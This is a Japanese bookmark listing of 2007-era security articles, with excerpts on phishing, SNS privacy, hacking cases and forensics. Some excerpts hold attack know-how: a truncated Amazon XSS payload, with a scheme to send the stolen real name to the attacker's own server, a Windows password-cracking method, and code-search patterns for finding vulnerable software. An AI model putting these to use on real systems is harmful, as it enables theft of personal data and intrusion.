タグ

securityに関するgymnoのブックマーク (117)

  • 最大最難の「メディアリスク」(2)システム障害を巡る記事の書き方、教えます

    コラムは2005年11月11日、日経ビジネスEXPRESS(現・日経ビジネスオンライン)に公開したものである。その当時、複数の証券取引所が相次いでシステム障害を起こし、それについて多数の新聞記事が出た。それらを読んで思わずむっとし、一気に書き上げた。再掲するにあたって読み直すと、我ながら面白く書けているが、「一体、何を言いたいのか」と思う読者もおられるかもしれない。今さらではあるが、何を言いたかったのか、改めて考えてみたので、冒頭に書き添えておく。 コラムに込めた意図は3点ある。まず第1は、紋切り型の新聞報道への批判である。第2は、マスコミ報道への防衛策を読者が考える際のヒントにして頂くことであった。マスコミがどのように行動するかを知っておくために、拙稿は役立つのではないかと思う。もっとも、広報担当者や経営者にとっては百も承知の内容かもしれない。第3は、書いていいかどうか迷うが、読者に

    最大最難の「メディアリスク」(2)システム障害を巡る記事の書き方、教えます
  • 第3回 ウイルス対策ソフトは効果なし:ITpro

    取引先や同僚を装って限られたユーザーをピンポイントに狙い,ウイルス・メールを送り付けるスピア型攻撃が国内で顕在化してきた。まんまと騙され,ウイルスをパソコン上に仕込まれると,これを発見するのは至難の業だ。 スピア攻撃で添付されてくるウイルスを対策ソフトが阻止してくれれば,感染は防げる。しかし,実際にはウイルス対策ソフトは無力だ。 犯罪者は「ウイルス対策ソフトを使って検知されないことを確認した上で攻撃を仕掛けてくる」(ISSの高橋CTO)からである。当然,送られてきたときには対応するパターン・ファイルがないため,ウイルス対策ソフトは反応しない。 スピア攻撃を助長する,こうした未知のウイルスが世の中にまん延していることを象徴する数字がある(図3)。テレコム・アイザック推進協議会とJPCERTコーディネーションセンターが2005年4月~5月に実施した調査結果だ。インターネット上にウイルスに感染さ

    第3回 ウイルス対策ソフトは効果なし:ITpro
  • メールアドレスから、mixiで住所と電話番号を調べられたそのカラクリ*ホームページを作る人のネタ帳

    メールアドレスから、mixiで住所と電話番号を調べられたそのカラクリ*ホームページを作る人のネタ帳
    gymno
    gymno 2007/03/16
    "この仕掛けを作った人は、彼女のメールアドレスを知っている事が条件です。 彼女に心あたりはあるそうですが・・・。その辺は私が口を挟むようなことではありませんよね。"
  • ITMediaにとんでもなく危険なLifeHackが載ってる件 - nak2kのブログ

    しかも、「mshta [任意のURL]」と入力すれば、WebページをHTA(HTMLアプリケーション)として開くことも可能だ。 「ファイル名を指定して実行」の便利な使い方(その1) - ITmedia エンタープライズ このTips、HTMLアプリケーションとしてWebページを実行した場合はIEのセキュリティゾーンがローカルコンピュータの状態で実行されるから、表示したWebページでは「どんなスクリプトでも」動かせてかなり危険。 以下のようなスクリプト(MicrosoftのJScriptについてのヘルプに載ってるサンプル)を含んだHTMLを上記の方法で表示してみたよ。 <script> var fso = new ActiveXObject("Scripting.FileSystemObject"); var a = fso.CreateTextFile("c:\\testfile.txt"

    ITMediaにとんでもなく危険なLifeHackが載ってる件 - nak2kのブログ
  • NHKで伝えきれなかったRMT問題の根深さ【コラム】 デジタル家電&エンタメ-最新ニュース:IT-PLUS

    「通信事業を気でやるんですかね」――。2019年10月に"第4のキャリア"として携帯電話事業に参入する楽天に対して、ソフトバンクの宮内謙社長は楽天の取り組みに対して心配顔でこう疑…続き ソフトバンク宮内社長「非通信の新事業、数千億円に」 [有料会員限定] iPhoneユーザーに選択迫る 総務省の「完全分離」案 [有料会員限定]

    NHKで伝えきれなかったRMT問題の根深さ【コラム】 デジタル家電&エンタメ-最新ニュース:IT-PLUS
  • 「SNSが企業舎弟になってしまった恐怖」 - 弁護士落合洋司(東京弁護士会)の日々是好日

    http://matimura.cocolog-nifty.com/matimulog/2007/02/sns_fb6c.html この件、ブログでも、 http://d.hatena.ne.jp/yjochi/20070218#1171756409 とコメントしましたが、かなり恐ろしいことが起きてしまった、ということは言えるでしょう。こういった危険性は、今後も存在し続け、気がついたら、微に入り細にわたる個人情報が、反社会的勢力の手中に入ってしまっている、ということが現実に起きる可能性があります(既に起きているかもしれません)。事件が起きてしまった後に、あわてて元警察官僚を連れて来る、捜査が終わってもいないのに、「ご安心下さい」などという、ふざけたメールをスパムのようにばらまく(これを読んで安心する人、というのは、よほどおめでたい人でしょう)、という程度の企業が、極めて多量の個人情報を保

    「SNSが企業舎弟になってしまった恐怖」 - 弁護士落合洋司(東京弁護士会)の日々是好日
  • SNSが企業舎弟になってしまった恐怖 - Matimulog

    mixiユーザとしては、ゆびとまで起こった事態に大いなる危機感を感じざるを得ない。 風評被害などといって、あたかも自分たちとは関係のない事件に関係あるかのような噂で迷惑しているような言い方をしているところに呆れかえるのだが、現時点で判明していることは、要するにSNSの代表取締役社長がヤクザの元組長であり、逮捕されるまで居座っていたということだ。 SNSというのはある程度(かなりの程度)個人情報やプライバシー情報をその中で公開し、リアルな知り合いとオンラインでつながったり、SNSでできた人間関係をオフラインに持ち込んだりする。社会の様々な層がそこに現れてプライベートな情報を蓄積していく。 mixiでは皇族の中にも利用者がいて騒ぎになったくらいであるし、別の例ではそこでの個人情報と事故で流出したファイルとが結びついてプライバシーの重大な侵害に結びついた事件が記憶に新しい。 プライベートな情報の

    SNSが企業舎弟になってしまった恐怖 - Matimulog
  • http://www.yomiuri.co.jp/net/cnet/20070220nt06.htm

  • NASAのシステム侵入事件--米国への身柄引き渡しの上訴審始まる

    NASAのコンピュータに侵入し損害を与えたとして起訴されている英国人Gary McKinnon被告の米国への身柄引き渡しに対する上訴審がはじまった。 McKinnon被告の弁護人Edmund Lawson氏は、米国で反テロリズム法が適用され有罪判決を受ければ、McKinnon被告は最長で60年間収監される可能性があるとロンドンの高等裁判所での審問で述べた。上訴審は現地時間2月13日に始まっている。 McKinnon被告は2001年から2002年に、米政府機関の97台のコンピュータに不正アクセスし、70万ドル相当の損害を与えた容疑に問われている。CNET News.comの姉妹サイトZDNet UKの取材に対してMcKinnon被告は、地球外生物の証拠を探してコンピュータにアクセスしたことは認めたが、故意に損害を与えた点については否認していた。 2006年5月、英国の下級判事裁判所は米国での

    NASAのシステム侵入事件--米国への身柄引き渡しの上訴審始まる
  • HD DVDとBlu-rayの暗号化がついに完全突破されました - GIGAZINE

    Doom9というその筋の人々には有名な海外のフォーラム(いわゆる掲示板みたいなもの)にて、「arnezami」という名前のハッカーがHD DVDとBlu-rayに使われているAACS DRMの復号過程で使用されるキーを発見してしまいました。そのため、これまでは個別に復号化していた今までの過程が全部ぶっ飛ぶことになり、あっという間に暗号化の解除が可能になりました。 また、既にこの結果を受けて「BackupHDDVD」と「BackupBluray」がバージョンアップされたようです。詳細は以下の通り。 Processing Key, Media Key and Volume ID found!!! - Page 6 - Doom9's Forum ハックしたわけでもなく、クラックしたわけでもなく、リバースエンジニアリングでもなく、「arnezami」はHD DVDとBlu-rayがメモリに読み込

    HD DVDとBlu-rayの暗号化がついに完全突破されました - GIGAZINE
  • http://denchu.jp/memo/?d=20070124

  • 切込隊長BLOG(ブログ) - やはりマイクロソフトが放つギャグはレベルが違う

    スパムとかウイルスとかそういう生易しいものではない事案が公表された。 > 例えば「Start, execute, CMD, shutdown-r」というコマンド付きのMP3ファイルを作成し、このMP3を再生するWebページをユーザーが訪れると、コンピュータが再起動させられてしまうという。 http://www.itmedia.co.jp/enterprise/articles/0702/01/news020.html そんな地雷が置かれたサイトを訪問しただけで再起動。インターネットは無法地帯であるべきだというマイクロソフトによるネット住民への宣戦布告じゃないだろうか。 > McAfeeではこのVistaの音声コマンド機能について、それほど大きな問題だとは思わないとしながらも、必要ないならオフにするようアドバイスしている。 いや、サイト訪れて強制再起動って、大きな問題じゃないかなあ

  • 仙台経済新聞を2秒でクラックした - omoti の日記

    なんか読売だかのサイトで 「仙台経済新聞がスタートする」 って書いてあって、それで 「正式に開始するまでサイトは見れないようになっている」 って書いてあって、そこに書いてあったURLを入れてみたら BASIC認証がかかっていて、IDとパスワードを入れないと 見れないようになっていた。 で、その責任者みたいなやつのインタビューが載っていて 「仙台の良い面をアピールしたい」 とかってインタビュー記事が載っていて、 今回、利用できるデーターはほんとにわずか それだけだったけど、たぶんこいつの頭の中は 「仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台! 仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台! 仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!仙台!」 って感じになってるんだろうなーと思って って入れてみたら、一回目の試行で いきなりヒットで、認証通って 来非公開の

  • Geekなぺーじ:Google Code Searchの危険な使われ方

    「Fun With Google Code Search」によると、 Google Code Searchを使って脆弱なソフトウェアを見つけられてしまうそうです。 実際に、Google Code Search経由で発見されてサーバを乗っ取られた事例が「How Hackers Are Using Google To Pwn Your Site」という記事で紹介されています。 ShoeMoneyが乗っ取られた事例では、恐らくWebサーバの設定ミスで.phpファイルの関連付けを行わない状態で、Google Sitemapsに登録してしまったため、Google Code Searchに自作コードが載ってしまい、それを見たクラッカーがサイトを乗っ取ったのであろうと思われます。 バッファオーバーフロー strcpy : strcpy\((\w+,\w+) lang:c sprintf : (sprin

  • 本名吸い取り機 (AMAZON XSS) :: ぼくはまちちゃん!

    ↓これ 超おすすめマンガなんです!!! うそだけど! ( 修正がはいりました。もう動きません ) 取得後 alert のかわりに、自前で用意したサーバーに <img src="http://自前サーバー/?名"> かなんかでリクエストするようにしといて、その後、適当な書籍にリダイレクトさせたりすれば…! 名吸い取り機のできあがり! こわいね>< リンクじゃなくて iframe とかにしちゃえば、へんなの踏ませる必要すらないよ! (ちょっとだけ解説) ↓urlデコードするとこう http://www.amazon.co.jp/exec/obidos/tg/detail/-/<body onload=eval(String.fromCharCode(118, 97, 114, 32, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 9

  • Windowsパスワード解析

    今回は、自宅WindowsXPのパスワード解除を検証してみます。 Administratorのパスワード忘れたしまった方、セキュリティーについて考えている方参考にどうぞ。 普段使っているWindowsPCに先ほどのCDを入れて起動させますと・・・ なんとLinux(Ubuntu Linux )がbootするではありませんか!ちなみにCDからブートさせるので WindowsOSは無事です。 しばらくすると、ターミナルが起動し、プログラムが勝手に走ります。 あら、パスワード検索してますよ・・・ すると、5分ぐらいですかね、全ユーザのパスワードが検索されてしまいました。 しかも、それなりに複雑なパスワードだったに・・・。怖いですね〜。 調べてみると、レジストリ内のSAM(Security Account Manager) を総当たりで解析するらしい。 で、対策

  • 「攻撃者の“足跡”を探せ」---Windowsレジストリの解析方法:ITpro

    自分の管理するシステムが不正アクセスされた場合には,影響範囲や原因を特定するために攻撃者の“痕跡”を調査する必要がある。対象システムがWindowsマシンであれば,レジストリの解析は不可欠。しかしながら通常のログ・ファイルと異なり,レジストリの調査は骨が折れる作業となる。そこで稿では,不正アクセスを受けたシステムにおけるレジストリの解析方法をまとめた。 なお,Windowsマシンにおける失われやすい情報(揮発性の高いデータ)の証拠保全については以前の記事でまとめているので,そちらを参照していただきたい。 レジストリの分析は容易ではない Windowsマシンが不正アクセスを受けた場合には,通常,以下の3種類のファイルを調査することになる。 (1)Windowsのイベント・ログ (2)各種アプリケーションのログ (3)レジストリ (1)と(2)については,通常の運用においても馴染みが深いので

    「攻撃者の“足跡”を探せ」---Windowsレジストリの解析方法:ITpro
  • Googleで効率よく新鮮な匿名プロキシを探す方法 - GIGAZINE

    いわゆるCGIプロキシとかPHPプロキシを一気に探し出す方法です。既存のこういうプロキシサイトをリスト化しているサイトよりも優れている点は、常にGoogleのほこるGoogleボットが世界中のページを駆けめぐって常に新鮮なプロキシを探してくれるということ。 探索方法は簡単、「include form」「remove scripts」「accept cookies」「show images」という各フレーズを含むサイトを検索結果で出すだけ。 やり方の詳細は以下の通り。 I-Hacked.com Taking Advantage Of Technology - How to Find 100,000+ Web Proxies and the State of Internet Censorship in the U.S. 検索は次のようになります。このリンクをお気に入りに入れるかブックマークし

    Googleで効率よく新鮮な匿名プロキシを探す方法 - GIGAZINE
  • mypress.jp

    This domain may be for sale!

    mypress.jp
  • Yahoo!みんなの政治 - 政治記事読みくらべ - 「日本を知るには裏社会を知る必要がある」

    サービス終了のお知らせ いつもYahoo! JAPANのサービスをご利用いただき誠にありがとうございます。 お客様がアクセスされたサービスは日までにサービスを終了いたしました。 今後ともYahoo! JAPANのサービスをご愛顧くださいますよう、よろしくお願いいたします。